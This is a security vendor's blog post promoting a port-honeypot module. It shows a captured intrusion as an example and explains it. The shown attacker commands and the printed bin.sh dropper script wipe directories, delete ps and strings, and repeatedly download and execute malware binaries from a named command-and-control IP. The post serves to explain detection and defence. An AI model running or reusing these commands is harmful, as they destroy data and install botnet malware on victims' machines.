Port HoneyPot is ready for action

A long time ago, in a galaxy far, far away … Ohh wait, it’s just happening. Yeah, one of the most anticipated ninja modules, the ‘gorgeous’ Port Honeypot has been released.  I know what you are thinking now “How can it be gorgeous? But seriously, this is about a security function”.  Let me introduce you this sexy component of the ninja protection, even Winnie the Pooh can’t say No to it.

More about Port Honeypot

This is a general honeypot module. After activating this module will set up 100 honeypots on your server on random ports chosen from the 1.000 most popular ports. It will detect, if someone does a deep port scan on your server (except syn stealth scan and some others), and also capture any traffic on these honeypots, so when the attacker tries to exploit one of these fake services, it will generate incidents. This is a very effective way to early catch attacks and botnet activities.

Port Honeypot does not bind on the actual ports, but binds on a port above 60.000 and uses iptables rules to forward from the actual ports. We use this to avoid any port to be blocked from real services. If there is a daemon starts listening a honeypot port, the module will automatically stop using that port as honeypot. When the module starts, it also lists all open sockets in listening mode, and won’t start honeypot on active ports. This way the module will automatically avoid any collision with real services. If you want, you can set ports to always use for honeypot purposes and you can set up ports that you never want to be used as honeypot.

Read more about how to configurate this module and also the chat scripts which can be used for faking services even more realistically >> Yeah let’s go to the documentation

(For customers: The new feature version is out, ready to manually update. We will auto update it for you on Thursday.)

Fun facts

We have captured more than 10 000 incidents on 5 test servers with this new module.

{

"PORT HIT": "189.14.202.110:51313->178.22.62.146:23",

"MESSAGES": "Array

(

[21:39:23] => sh

[21:39:27] => cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://74.118.193.239/bin.sh; sh bin.sh; wget1 http://74.

[21:39:30] => cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;mv -f /usr/bin/-wget /usr/bin/wget;mv -f /usr/sbin/-wget /usr/bin/wget;mv -f /bin/-wget /bin/wget;mv -f /sbin/-wget /bin/wget;wget http://74.118.193.239/bin.sh; sh bin.sh; wget1 http://74.

This is a good example of a malicious request captured by the Port HoneyPot module. You can see clearly that the attacker is trying to run a shell (sh) and then a long command. The long command does basically this:

  1. Try to cd into one of /tmp, /va/run, /dev/shm, /mnt /var whichever possible first.
  2. Move the /usr/bin/-wget executable to /usr/bin/wget, and try the same in /usr/sbin and /usr/bin
  3. Using the wget program it tries to download a script form the given c&c server, and execute it using the default shell interpreter.

What is inside the bin.sh script? We have downloaded this script for you:

#!/bin/bash

rm -f *

busybox rm -rf /tmp/*

busybox rm -rf /root/*

busybox rm -rf /usr/bin/strings

busybox rm -rf /usr/bin/ps

busybox wget http://74.118.193.239/10; busybox chmod +x 10; ./10; busybox rm -f 10*

rm -f *

busybox wget http://74.118.193.239/11; busybox chmod +x 11; ./11; busybox rm -f 11*

rm -f *

busybox wget http://74.118.193.239/13; busybox chmod +x 13; ./13; busybox rm -f 13*

rm -f *

busybox wget http://74.118.193.239/14; busybox chmod +x 14; ./14; busybox rm -f 14*

rm -f *

busybox wget http://74.118.193.239/15; busybox chmod +x 15; ./15; busybox rm -f 15*

rm -f *

busybox wget http://74.118.193.239/16; busybox chmod +x 16; ./16; busybox rm -f 16*

rm -f *

busybox wget http://74.118.193.239/17; busybox chmod +x 17; ./15; busybox rm -f 17*

rm -f *

busybox wget http://74.118.193.239/10; busybox cp /bin/busybox ./; busybox cat 10 > busybox; busybox rm -f 10; busybox cp busybox 10; busybox rm -f busybox; ./10; busybox rm -f 10*

rm -f *

busybox wget http://74.118.193.239/11; busybox cp /bin/busybox ./; busybox cat 11 > busybox; busybox rm -f 11; busybox cp busybox 11; busybox rm -f busybox; ./11; busybox rm -f 11*

rm -f *

busybox wget http://74.118.193.239/13; busybox cp /bin/busybox ./; busybox cat 13 > busybox; busybox rm -f 13; busybox cp busybox 13; busybox rm -f busybox; ./13; busybox rm -f 13*

rm -f *

busybox wget http://74.118.193.239/14; busybox cp /bin/busybox ./; busybox cat 14 > busybox; busybox rm -f 14; busybox cp busybox 14; busybox rm -f busybox; ./14; busybox rm -f 14*

rm -f *

busybox wget http://74.118.193.239/15; busybox cp /bin/busybox ./; busybox cat 15 > busybox; busybox rm -f 15; busybox cp busybox 15; busybox rm -f busybox; ./15; busybox rm -f 15*

rm -f *

busybox wget http://74.118.193.239/16; busybox cp /bin/busybox ./; busybox cat 16 > busybox; busybox rm -f 16; busybox cp busybox 16; busybox rm -f busybox; ./16; busybox rm -f 16*

rm -f *

busybox wget http://74.118.193.239/17 busybox cp /bin/busybox ./; busybox cat 17 > busybox; busybox rm -f 17; busybox cp busybox 17; busybox rm -f busybox; ./17; busybox rm -f 17*

rm -f *

exit

So, the next question is, what contains the http://74.118.193.239/10, and the other 7 files ? We have downloaded them, too. They are malware/virus files. The bin.sh script will download and execute them, then it deletes the file itself, but the viruses remian in memory.

This is a good example of attack BitNinja Port Honeypot is able to automatically save your server against.

Happy hacker hunting! BitNinja will be always there for you

Sign up for the 7-day BitNinja trial, and let the Port HoneyPot get the hunting party started.